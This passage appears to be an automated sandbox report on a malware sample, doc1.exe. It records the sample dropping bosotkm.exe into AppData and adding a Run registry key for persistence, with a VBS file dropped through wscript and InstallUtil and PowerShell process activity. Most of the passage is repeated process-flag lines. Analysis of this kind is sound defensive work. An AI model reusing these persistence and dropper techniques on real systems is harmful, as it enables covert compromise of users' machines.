                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016371CD push esi; iretd 11_2_016371CF
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016371AB push esi; iretd 11_2_016371AD
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_0163705E push edi; iretd 11_2_0163705F
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016370E5 push edi; iretd 11_2_016370E7
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016370C1 push edi; iretd 11_2_016370C2
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637080 push edi; iretd 11_2_01637081
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_0163709E push edi; iretd 11_2_016370A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637365 push esp; iretd 11_2_01637367
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637343 push esp; iretd 11_2_01637345
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637322 push ebp; iretd 11_2_01637323
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016373F6 push esp; iretd 11_2_016373F8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016373D5 push esp; iretd 11_2_016373D6
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016373AD push esp; iretd 11_2_016373AE
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637385 push esp; iretd 11_2_01637386
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637273 push ebp; iretd 11_2_01637279
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_0163724E push ebp; iretd 11_2_01637254
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_0163720E push esi; iretd 11_2_01637210
                  Source: doc1.exeStatic PE information: section name: .text entropy: 7.920829116713707
                  Source: bosotkm.exe.1.drStatic PE information: section name: .text entropy: 7.920829116713707

                  Persistence and Installation Behavior

                  barindex
                  Windows Shell Script Host drops VBS files
                  Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbsJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeFile created: C:\Users\user\AppData\Roaming\bosotkm.exeJump to dropped file
                  Source: C:\Users\user\Desktop\doc1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bosotkmJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bosotkmJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
